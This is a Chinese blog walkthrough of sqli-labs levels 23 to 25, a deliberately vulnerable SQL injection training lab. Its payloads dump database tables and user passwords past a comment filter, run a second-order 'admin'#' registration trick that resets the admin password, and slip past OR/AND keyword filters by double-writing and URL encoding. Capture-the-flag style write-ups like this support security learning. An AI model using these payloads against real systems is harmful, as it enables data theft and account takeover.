sqli-labs第23~25关

已于 2023-05-13 14:48:48 修改
阅读量167 收藏 2
点赞数
文章标签: sql 数据库
于 2023-05-13 14:47:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuqnqi/article/details/130656384
版权

第23关

判断为get传参,类似于前10关

 直接在URL上输入SQL语句

 

判断为单引号闭合

与前10关不同的是,注释符无效,我们去看看源码

发现注释符被正则表达式过滤

且为id传参,单引号闭合

所以想办法不用注释符就搞掉后面的单引号

于是乎,构造语句?id=1' or '1'='1

联合查询爆数据库

?id=' union select 1,2,database() '

爆表

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '

爆字段

 ?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '

爆值payload

 ?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

当然也可以报错注入和其他方法

第24关

二次注入

 这个页面,看起来很高大上的样子

先看一下源码吧,拓展一下做题思路嘛

 myaql_real_escape_string是一个防止SQL注入的函数

username没有用这个函数,考虑用username注入,变量$username单引号闭合

在知道admin是特权用户的前提下,可以构造用户名admin'#来拼接到源代码中,相当于admin特权用户

注册一个普通账号,账号名为admin'# 密码随意设,可以设为123456

创建完用户后登录进去·

 

 得到一下页面即为登陆成功, 根据页面提示修改密码,(实际上修改的是admin的密码)

修改完成后点Reset

之后点logout退出,重新登录,用户名用admin,密码为刚刚修改的密码

 admin账户登陆成功

 SUCCESS!!!

第25关

OR & AND欺骗,双写绕过

先正常测试一下

?id=1

?id=1'

?id=1' --+


 

 

方法一,--+绕过,一般注入。

样例payload

?id=-1' union select 1,2 database()--+

 发现联合查询就可以,遇见and或or时双写or或and绕过

eg.

?id=0' oorr 1=1 --+
?id=2' aandnd 1=1 --+

 

eg.

?id=-1' union select 1,2,group_concat(username,0x7e,passwoorrd) from users--+

方法二,用逻辑运算符与&&代替and,逻辑运算符或||代替or

但是在URL中,需要对&&,||进行URL编码

http://www.jsons.cn/urlencode/

eg.

?id=0' %7C%7C 1=1 --+

?id=2' %26%26 1=1 --+

宇语
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql-labs通技巧
03-01
SQL注入常用靶场的通技巧
SQL-labs的第23——注释被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 195
这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。但是如果是3个null,那么不会报错,这说明总共有3个注入位置。我们有添加了),但是仍然报错,这时我们怀疑注释符被屏蔽了。接下来,我们看一下,那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是',并且注释符被屏蔽了。我们发现这里好像有回显,我们输入语句。使用报错注入也可以。
sqllab第二十三笔记
最新发布
I_WORM的博客
03-15 344
成功注入,说明这里的输入读取是mysql_fetch_array("select 1,2,3 from 表 where id ='输入内容'")构造payload:id=0'+union+select+1,version(),database()+'出现了语法错误的界面,发现好像利用了mysql_fetch_array()进行输入读取。构造payload:id=0'+union+select+1,2,3+'构造payload:id=0'+or+1='1。成功爆出了语法错误,说明读取输入用到了单引号。
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三SQLi-LABS Less-23SQLi-LABS Less 23SQLiLABS Less23SQLi Less 23
sqli-labs靶场(23-38
weixin_51566481的博客
08-16 1124
sqli-labs,sql注入
sqli--labs 进阶篇 23_24
Lucky小小吴的小屋
01-30 516
直接登录进入,通过注册一个含有特殊字符的账号,再修改密码,从而修改掉原本的数据库中已存在的账号信息。到这里,自己没有什么思路,不知道怎么注入,看了下题目讲到二阶注入,猜测我们需要在。pass_change.php 登录成功后,有更新操作的处理。源码文件,重要的只有四个,下面就依次看一下源码文件的具体功能。更新账号密码时,账户信息没有过滤,是直接更新的,可以利用!注册一个新的,账号:admin’# ,密码:123。进一步确定自己的推论,源码中,存在过滤掉一些注释语句。
基于Sqli-Labs靶场的SQL注入-23~24
Joker
01-04 1194
重点讲二次注入
sql-labs靶场第23-53新手通学习详解
m0_70483044的博客
11-10 1181
sql-labs 23-53新手教程~很早之前的文章忘记发了!!!有错误的地方欢迎指正!菜鸟选手。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
sqli-labs通(二十三)
qq_65950075的博客
05-08 448
这一是get类型当输入?id=1'时,出现报错信息,是由单引号闭合的但是输入?id=1'--+的时候,还是报错,说明我们的注释符可能被过滤处理了查看码源,确实是把注释符过滤了那我们还是根据语句构造?成功了判断字段数,这里不能用order by,只能不断往上加数字,不过一般都是3?说明是三个字段,只显示2号位,那我们就可以在这个位置进行注入?
sqli-labs-master第23
m_ing
05-17 1100
前言:从一开始我们是GET-----POST的路线来研究sql注入,这我们在从头早来研究GET请求方式。 http://192.168.89.139/sqli-labs-master/Less-23/ 我看到这个页面很是熟悉,提示我们输入id值作为参考。 我们加个’试一下 再来利用and来测试下,加入注释符#,编码成%23同样的报错 我们感到很好奇,还是看下原本代码 对注释符等都进行了过滤 突然一懵,我查阅了一些资料,只能采用单引号闭合的方法来绕过了,我们试试看! ?id 1=1’ and ‘1’=
Sqli靶场23-->30
huohaowen的博客
02-05 1531
我:WAF我和你拼了!! WAF:Woof,Woof!!
sqlilab学习打卡|手工注入|Less23-Less31
spring!
04-02 1455
sqlilab学习打卡|手工注入|Less23-Less31
SqliLab Less23-28 WriteUp
jhzzzz的博客
01-24 229
文章目录二次排序注入绕过注释符注入 二次排序注入 绕过注释符注入
sqli-labs-master前10
07-28
回答: 在sqli-labs-master前10中,可以使用不同的注入方法来获取数据库和表的信息。其中,联合查询、报错注入和sqlmap是常用的注入方法。联合查询可以通过判断注入点的类型、判断列数和使用order by语句来获取表名和字段名。报错注入可以通过使用extractvalue()函数来获取表名、字段名和字段的详细内容。而sqlmap是一款专门用于自动化注入的工具,可以通过指定参数和选项来获取数据库名、表名、字段名和字段的详细信息。在具体的卡中,可以根据题目要求和注入点的特点选择合适的注入方法来解决问题。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [【渗透测试】sqli-labs闯(1-10)](https://blog.csdn.net/qq_43168364/article/details/105496598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs前十记录](https://blog.csdn.net/qq_43277152/article/details/113388041)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs(1-10)](https://blog.csdn.net/weixin_44268918/article/details/127181936)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值